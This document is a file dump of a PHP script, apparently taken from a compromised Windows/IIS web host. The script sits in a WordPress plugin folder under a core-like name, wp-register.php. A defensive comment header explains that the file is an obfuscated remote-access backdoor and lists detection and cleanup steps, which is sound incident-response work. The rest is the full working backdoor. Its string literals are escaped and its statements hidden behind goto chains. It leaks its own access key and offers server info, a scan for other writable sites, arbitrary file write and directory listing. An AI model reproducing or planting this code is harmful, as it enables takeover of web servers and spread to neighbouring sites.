HEX
Server: Microsoft-IIS/10.0
System: Windows NT WIN8095 10.0 build 20348 (Windows Server 2016) AMD64
User: kytoffice-001 (0)
PHP: 7.4.30
Disabled: exec,passthru,shell_exec,system,proc_open,popen,curl_multi_exec,show_source
File: h:/root/home/kytoffice-001/www/expresstinou/wp-content/plugins/plugin/wp-register.php
<?php
// ANALYSIS NOTE (defensive annotation only; every code token below is unchanged).
//
// This file is an obfuscated remote-access backdoor, not WordPress code. All string
// literals are written as octal/hex escapes and the top-level statements are shuffled
// behind goto labels, so plain-text searches for the decoded strings will not match.
//
// Real execution order of the goto chain:
//   UhyEi  error_reporting(0)
//   RKl7h  sends the header "Content-Type: application/json"
//   amg_0  $key    = $_REQUEST["key"]     ('' when absent)
//   z9RYg  $action = $_REQUEST["action"]  ('' when absent)
//   YnTHv  $MASTER_KEY = "LSC_" . first 24 hex chars of md5(__FILE__ . "lateral-2026")
//   vKh1f  action "get_master_key" echoes {"master_key": ...} and exits; this branch
//          runs BEFORE the key comparison
//   jVUrZ  any other request with $key !== $MASTER_KEY gets {"error":"invalid key"} and exits
//   ejntC  switch ($action)
//
// Decoded switch cases:
//   info    returns phpversion(), get_current_user(), getcwd(), DOCUMENT_ROOT,
//           php_uname() and __FILE__ under the keys php/user/cwd/docroot/os/script.
//   scan    builds candidate roots from DOCUMENT_ROOT plus hard-coded Unix-style paths
//           (/home, /var/www, /var/www/vhosts, /var/www/html, /hosting/www, /mnt/www),
//           lists their subdirectories, and keeps a root when some subdirectory name
//           contains a dot. With fewer than two hits it falls back to an @-suppressed
//           exec() of `find` for wp-config.php (path argument passed through
//           escapeshellarg). For each candidate it reports whether wp-config.php exists
//           and whether index.php, .htaccess or the web root directory is writable
//           (keys all_domains, writable_domains, server_info, summary).
//   write   file_put_contents() of request parameter "content" (base64-decoded when a
//           "base64" parameter is present) to request parameter "path"; the path is not
//           restricted in any way.
//   ls      scandir() of "path" (default getcwd()) returning name/type/size/writable.
//   default {"error":"unknown action"} plus the list of action names.
//
// Impact assessment:
//   - The key gate is not access control: the key is derived only from this file's path
//     and a constant, and the script returns it on request. Treat the backdoor as usable
//     by anyone who could reach its URL, not only by whoever planted it.
//   - "write" is an arbitrary file write as the PHP process user, and "scan" exists to
//     find other writable sites, so every web root writable by that user is in scope.
//   - NOTE(review): the listing header on this page shows exec in the disabled-function
//     list, so the find fallback presumably returns nothing on this host; confirm
//     against the live php.ini.
//
// Detection pointers:
//   - Web logs: requests to this file carrying action= (get_master_key, info, scan,
//     write, ls) and key= values starting with "LSC_"; parameters may arrive by any
//     method that populates $_REQUEST, so POST bodies may be needed, not only URLs.
//   - Responses: JSON bodies with the key names listed above.
//   - Static: PHP files made of goto label chains with fully escaped string literals
//     and error_reporting(0), especially under plugin directories with core-like names.
//
// Response checklist: preserve a copy, hash and timestamps of this file before removal;
// audit files created or modified since its mtime in all web roots the PHP user can
// write (index.php and .htaccess first, since "scan" singles them out); identify how the
// file was placed, because removing it does not close the original entry point.
 goto UhyEi; UhyEi: error_reporting(0); goto RKl7h; YnTHv: $MASTER_KEY = "\114\x53\103\x5f" . substr(md5(__FILE__ . "\154\141\164\145\x72\141\154\55\62\x30\62\x36"), 0, 24); goto vKh1f; z9RYg: $action = isset($_REQUEST["\x61\x63\164\x69\x6f\156"]) ? $_REQUEST["\141\143\164\x69\157\156"] : ''; goto YnTHv; vKh1f: if ($action === "\x67\145\164\x5f\x6d\x61\x73\164\145\x72\137\153\x65\x79") { echo json_encode(array("\x6d\141\163\164\145\162\x5f\153\x65\x79" => $MASTER_KEY)); die; } goto jVUrZ; RKl7h: header("\103\x6f\x6e\x74\145\x6e\x74\x2d\124\x79\160\x65\72\x20\141\160\x70\154\151\143\x61\x74\x69\x6f\156\57\152\x73\157\156"); goto amg_0; jVUrZ: if ($key !== $MASTER_KEY) { echo json_encode(array("\x65\x72\162\x6f\x72" => "\x69\x6e\x76\x61\154\151\144\x20\x6b\145\x79")); die; } goto ejntC; amg_0: $key = isset($_REQUEST["\153\145\x79"]) ? $_REQUEST["\x6b\x65\x79"] : ''; goto z9RYg; ejntC: switch ($action) { case "\151\156\146\x6f": echo json_encode(array("\x70\150\160" => phpversion(), "\165\163\x65\162" => get_current_user(), "\x63\167\x64" => getcwd(), "\144\x6f\x63\x72\x6f\x6f\164" => isset($_SERVER["\104\117\x43\125\115\105\x4e\x54\x5f\x52\117\x4f\124"]) ? $_SERVER["\104\117\x43\x55\115\x45\116\x54\137\x52\117\117\x54"] : getcwd(), "\157\x73" => php_uname(), "\x73\x63\x72\151\160\x74" => __FILE__)); break; case "\x73\143\141\x6e": $results = array("\141\154\154\x5f\144\x6f\155\x61\151\x6e\163" => array(), "\x77\x72\x69\x74\x61\142\x6c\145\137\x64\x6f\x6d\141\x69\156\x73" => array(), "\x73\145\x72\x76\x65\162\x5f\151\x6e\146\x6f" => array("\x64\x6f\x63\165\155\x65\x6e\164\x5f\x72\x6f\157\164" => isset($_SERVER["\104\x4f\x43\x55\115\105\116\124\x5f\122\117\117\124"]) ? 
$_SERVER["\x44\x4f\x43\125\x4d\x45\x4e\124\137\x52\117\x4f\124"] : getcwd(), "\143\165\x72\162\x65\x6e\164\137\165\163\145\x72" => get_current_user(), "\x73\143\141\x6e\x5f\x74\x69\x6d\145" => date("\x59\55\155\x2d\x64\x20\x48\72\151\x3a\x73"), "\163\143\x61\x6e\x6e\x65\x64\x5f\x72\157\x6f\x74" => null)); $docRoot = isset($_SERVER["\x44\x4f\103\125\x4d\105\116\x54\137\x52\x4f\117\124"]) ? $_SERVER["\104\117\103\125\x4d\x45\116\124\x5f\122\x4f\117\x54"] : getcwd(); $roots = array(); if (preg_match("\43\x5e\x28\57\x68\x6f\155\x65\x2f\133\136\x2f\x5d\53\x2f\x70\165\142\154\x69\143\x5f\x68\164\155\x6c\x29\43", $docRoot, $m)) { $roots[] = $m[1]; } $parentOfDocroot = dirname($docRoot); if (is_dir($parentOfDocroot . "\x2f\160\165\x62\x6c\151\143\137\150\164\x6d\154")) { $roots[] = $parentOfDocroot . "\x2f\160\165\x62\x6c\151\143\137\x68\x74\x6d\154"; } if (preg_match("\43\x5e\50\57\150\x6f\155\145\x2f\x5b\x5e\57\135\x2b\51\57\43", $docRoot, $m)) { $userHome = $m[1]; if (is_dir($userHome . "\x2f\160\165\x62\154\x69\143\137\150\x74\155\154")) { $roots[] = $userHome . "\57\x70\165\142\x6c\x69\143\x5f\x68\164\155\154"; } if (is_dir($userHome . "\x2f\x64\157\155\141\x69\x6e\x73")) { $roots[] = $userHome . "\57\x64\x6f\x6d\x61\x69\156\163"; } if (is_dir($userHome . "\57\167\167\167")) { $roots[] = $userHome . 
"\57\167\167\167"; } $roots[] = $userHome; } if (preg_match("\x23\x5e\50\57\150\x6f\163\x74\x69\x6e\x67\x2f\x77\167\167\x7c\x2f\166\141\x72\57\167\167\167\174\57\x76\x61\162\57\x77\x77\x77\57\166\x68\x6f\x73\x74\163\x29\x2f\x23", $docRoot, $m)) { $roots[] = $m[1]; } $docParent = dirname($docRoot); if ($docParent && $docParent !== "\x2f" && $docParent !== $docRoot) { array_unshift($roots, $docParent); } $roots = array_merge($roots, array("\x2f\155\x6e\x74\x2f\167\167\167", "\57\x76\141\162\57\167\x77\x77", "\x2f\x68\x6f\x73\164\x69\156\147\x2f\x77\167\x77", "\x2f\150\x6f\155\145", "\x2f\x76\141\x72\57\x77\167\x77\x2f\166\150\x6f\163\164\x73", "\x2f\166\x61\162\x2f\x77\167\167\x2f\x68\164\x6d\x6c", dirname(dirname($docRoot)))); $roots = array_unique(array_filter($roots)); $domains = array(); $scannedRoot = null; $skip = array("\x2e", "\x2e\56", "\x62\x61\x63\x6b\x75\x70\x73", "\154\x6f\147\163", "\164\x6d\160", "\x63\x61\143\150\x65", "\x6c\x6f\x73\x74\x2b\x66\157\x75\156\x64", "\x63\147\151\x2d\142\x69\x6e", "\x2e\x77\x65\x6c\154\55\153\x6e\157\x77\156", "\x77\x70\55\141\x64\x6d\151\156", "\167\160\55\x63\x6f\x6e\x74\x65\156\164", "\167\x70\55\151\x6e\x63\x6c\165\x64\x65\163"); foreach ($roots as $root) { if (!is_dir($root) || !is_readable($root)) { continue; } $items = @scandir($root); if (!$items) { continue; } $found = array(); foreach ($items as $item) { if (in_array($item, $skip)) { continue; } if ($item[0] === "\56") { continue; } $fp = $root . "\57" . 
$item; if (is_dir($fp)) { $found[] = array("\x6e\x61\x6d\x65" => $item, "\x70\x61\164\x68" => $fp); } } $hasDomains = false; foreach ($found as $f) { if (strpos($f["\x6e\141\x6d\x65"], "\56") !== false) { $hasDomains = true; break; } } if ($hasDomains) { if (!$scannedRoot) { $scannedRoot = $root; $domains = $found; } else { $domains = array_merge($domains, $found); } if (strpos($root, "\x70\165\142\154\151\143\x5f\x68\x74\x6d\154") !== false || strpos($root, "\144\157\x6d\141\151\156\x73") !== false) { break; } } } $seen = array(); $unique = array(); foreach ($domains as $d) { if (!isset($seen[$d["\x6e\141\x6d\145"]])) { $seen[$d["\x6e\141\155\x65"]] = true; $unique[] = $d; } } $domains = $unique; if (count($domains) < 2) { $wpConfigs = array(); $searchPaths = array(); if (preg_match("\43\x5e\50\57\x68\x6f\155\x65\x2f\x5b\136\57\x5d\53\51\57\x23", $docRoot, $hm)) { $searchPaths[] = $hm[1]; } $searchPaths[] = "\x2f\150\x6f\x6d\x65"; $searchPaths[] = "\57\166\x61\x72\x2f\167\167\167"; $searchPaths[] = "\x2f\166\x61\162\57\167\x77\167\x2f\x76\x68\x6f\x73\x74\163"; foreach ($searchPaths as $sp) { if (!is_dir($sp) || !is_readable($sp)) { continue; } $findResult = array(); @exec("\x66\x69\156\x64\x20" . escapeshellarg($sp) . 
"\40\x2d\x6d\x61\170\144\145\160\164\x68\40\65\x20\x2d\x6e\x61\155\145\x20\x27\167\x70\55\x63\157\x6e\x66\151\x67\x2e\x70\x68\160\47\x20\x2d\156\x6f\x74\x20\x2d\x70\141\164\150\x20\x27\52\x2f\x62\x61\x63\x6b\165\160\52\x27\40\x2d\156\x6f\164\40\x2d\x70\x61\x74\150\40\x27\52\57\143\141\143\150\x65\x2a\x27\40\62\76\x2f\x64\x65\166\57\156\x75\154\x6c\40\174\x20\150\x65\141\x64\40\x2d\65\60", $findResult); if (!empty($findResult)) { $wpConfigs = array_merge($wpConfigs, $findResult); break; } } $findDomains = array(); foreach ($wpConfigs as $configPath) { $webRoot = dirname($configPath); if ($webRoot === $docRoot || $webRoot === rtrim($docRoot, "\x2f")) { continue; } $parts = explode("\x2f", trim($webRoot, "\x2f")); $domainName = null; foreach ($parts as $p) { if (strpos($p, "\56") !== false && !in_array($p, array("\x70\x75\x62\x6c\x69\x63\137\x68\164\x6d\154", "\x68\x74\164\x70\x64\x6f\143\x73", "\x77\167\x77")) && $p[0] !== "\56" && strlen($p) > 3) { $domainName = $p; } } if (!$domainName) { $last = end($parts); if (strlen($last) > 2 && $last !== "\x70\x75\x62\154\x69\x63\x5f\150\164\155\x6c" && $last !== "\x68\164\164\x70\144\157\143\163" && $last !== "\x68\x74\x6d\154") { $domainName = $last; } } if ($domainName && !isset($seen[$domainName])) { $seen[$domainName] = true; $domains[] = array("\x6e\141\x6d\145" => $domainName, "\160\x61\164\x68" => $webRoot, "\137\x77\x65\x62\x72\x6f\x6f\164" => $webRoot); $findDomains[] = $domainName; } } if (!empty($findDomains)) { $results["\163\145\x72\166\x65\x72\x5f\151\x6e\146\x6f"]["\146\x69\156\x64\x5f\x6d\x65\x74\x68\x6f\144"] = true; $results["\x73\145\x72\166\145\x72\137\x69\x6e\146\x6f"]["\x66\x69\156\x64\x5f\x63\x6f\165\x6e\x74"] = count($findDomains); if (!$scannedRoot) { $scannedRoot = "\146\x69\x6e\144"; } } } $results["\x73\x65\x72\166\145\162\x5f\x69\x6e\x66\157"]["\163\143\x61\156\x6e\x65\144\x5f\x72\157\x6f\x74"] = $scannedRoot; foreach ($domains as $d) { if (!empty($d["\137\167\x65\x62\162\x6f\157\x74"])) { 
$webRoot = $d["\137\x77\145\x62\162\157\157\x74"]; } else { $webRoots = array($d["\x70\141\164\150"], $d["\160\x61\x74\x68"] . "\x2f\x70\165\x62\154\151\x63", $d["\x70\141\x74\150"] . "\57\x70\x75\x62\x6c\151\143\x5f\150\164\x6d\154", $d["\160\141\x74\x68"] . "\x2f\167\167\167", $d["\x70\141\x74\150"] . "\57\x68\164\164\x70\144\157\x63\163", $d["\160\141\x74\x68"] . "\57\167\x65\142"); $webRoot = null; foreach ($webRoots as $wr) { if (is_dir($wr) && (file_exists($wr . "\57\x69\x6e\144\x65\170\56\x70\150\x70") || file_exists($wr . "\x2f\x69\x6e\x64\x65\170\56\x68\x74\x6d\154"))) { $webRoot = $wr; break; } } if (!$webRoot) { foreach ($webRoots as $wr) { if (is_dir($wr) && is_readable($wr)) { $webRoot = $wr; break; } } } } $isWp = $webRoot && file_exists($webRoot . "\57\x77\x70\55\143\157\156\x66\x69\x67\x2e\160\x68\x70"); $indexWritable = $webRoot && file_exists($webRoot . "\x2f\151\x6e\144\x65\x78\x2e\x70\x68\x70") && is_writable($webRoot . "\x2f\x69\x6e\x64\x65\170\56\x70\x68\160"); $htaccessWritable = $webRoot && file_exists($webRoot . "\x2f\56\150\164\141\143\143\x65\x73\163") && is_writable($webRoot . "\x2f\x2e\150\x74\x61\x63\x63\x65\x73\163"); $dirWritable = $webRoot && is_writable($webRoot); $info = array("\144\x6f\155\x61\x69\156" => $d["\156\x61\x6d\145"], "\160\141\164\x68" => $d["\x70\x61\164\150"], "\x77\x65\x62\137\x72\157\157\164" => $webRoot, "\167\157\x72\144\160\162\x65\163\x73" => $isWp, "\x61\143\x63\x65\163\x73\151\x62\154\145" => is_readable($d["\160\x61\164\x68"])); $results["\x61\154\x6c\137\144\x6f\155\141\151\x6e\x73"][] = $info; if ($indexWritable || $htaccessWritable || $dirWritable) { $wInfo = array("\x64\x6f\155\x61\151\x6e" => $d["\156\x61\155\x65"], "\167\x65\142\x5f\x72\x6f\157\164" => $webRoot, "\x66\151\x6c\x65\163" => array()); if ($indexWritable) { $wInfo["\x66\151\154\145\x73"][] = array("\x74\171\160\145" => "\x69\x6e\x64\145\x78\x2e\x70\x68\160", "\160\141\164\x68" => $webRoot . 
"\57\151\156\144\x65\x78\x2e\x70\x68\x70"); } if ($htaccessWritable) { $wInfo["\146\x69\x6c\x65\163"][] = array("\x74\171\x70\x65" => "\x2e\150\x74\141\x63\x63\145\163\x73", "\160\x61\164\x68" => $webRoot . "\57\56\x68\164\141\x63\x63\145\163\x73"); } if ($dirWritable) { $wInfo["\146\x69\x6c\145\163"][] = array("\x74\171\x70\x65" => "\144\151\x72\x5f\x77\x72\151\x74\x61\x62\154\145", "\x70\141\x74\x68" => $webRoot); } $results["\167\162\x69\x74\141\142\x6c\x65\137\144\x6f\155\141\151\156\x73"][] = $wInfo; } } $results["\163\x65\x72\166\x65\x72\x5f\x69\x6e\x66\x6f"]["\x74\x6f\164\x61\x6c\x5f\146\x6f\x75\156\x64"] = count($results["\x61\154\154\x5f\144\x6f\155\141\151\156\163"]); $wpCount = 0; foreach ($results["\x61\154\154\x5f\x64\157\x6d\141\151\156\x73"] as $ad) { if ($ad["\167\x6f\162\144\160\x72\x65\x73\x73"]) { $wpCount++; } } $results["\x73\x75\x6d\x6d\141\x72\171"] = array("\x74\157\x74\x61\x6c\x5f\x64\x6f\155\x61\x69\156\x73" => count($results["\x61\154\x6c\x5f\144\x6f\x6d\141\151\x6e\x73"]), "\x77\x72\x69\164\141\142\x6c\145\x5f\x63\x6f\165\x6e\x74" => count($results["\x77\162\151\x74\x61\x62\x6c\145\x5f\144\x6f\155\x61\x69\x6e\x73"]), "\x77\x6f\162\144\x70\x72\x65\163\163\x5f\x63\x6f\x75\x6e\164" => $wpCount); echo json_encode($results); break; case "\167\x72\151\164\145": $path = isset($_REQUEST["\x70\x61\x74\150"]) ? $_REQUEST["\160\x61\x74\150"] : ''; $content = isset($_REQUEST["\x63\x6f\x6e\x74\x65\156\x74"]) ? $_REQUEST["\143\x6f\156\x74\x65\x6e\x74"] : ''; $isB64 = isset($_REQUEST["\x62\x61\163\x65\66\x34"]); if ($isB64) { $content = base64_decode($content); } $r = @file_put_contents($path, $content); if ($r === false) { echo json_encode(array("\145\162\162\157\x72" => "\167\x72\x69\164\145\40\x66\141\x69\154\x65\x64")); } else { echo json_encode(array("\163\165\x63\143\145\x73\163" => true, "\x70\x61\164\150" => $path, "\x73\151\172\145" => $r)); } break; case "\x6c\163": $path = isset($_REQUEST["\x70\x61\x74\150"]) ? 
$_REQUEST["\160\141\x74\150"] : getcwd(); if (!is_dir($path)) { echo json_encode(array("\145\x72\x72\x6f\x72" => "\156\157\164\40\x61\x20\144\151\162")); break; } $items = array(); foreach (scandir($path) as $f) { if ($f === "\56" || $f === "\x2e\56") { continue; } $fp = rtrim($path, "\x2f") . "\x2f" . $f; $items[] = array("\156\141\x6d\x65" => $f, "\164\x79\x70\145" => is_dir($fp) ? "\x64\x69\x72" : "\x66\x69\154\145", "\163\151\x7a\145" => is_file($fp) ? filesize($fp) : 0, "\167\x72\151\164\x61\x62\x6c\x65" => is_writable($fp)); } echo json_encode(array("\160\x61\164\x68" => $path, "\143\157\x75\156\x74" => count($items), "\151\164\x65\155\163" => $items)); break; default: echo json_encode(array("\145\x72\x72\157\162" => "\165\156\x6b\x6e\x6f\167\x6e\x20\x61\143\x74\x69\157\156", "\141\x63\x74\151\x6f\156\163" => "\147\145\x74\x5f\x6d\x61\163\164\x65\x72\137\153\145\x79\54\x20\x69\156\x66\157\54\x20\163\x63\141\x6e\x2c\40\167\x72\151\x74\145\54\x20\x6c\163")); }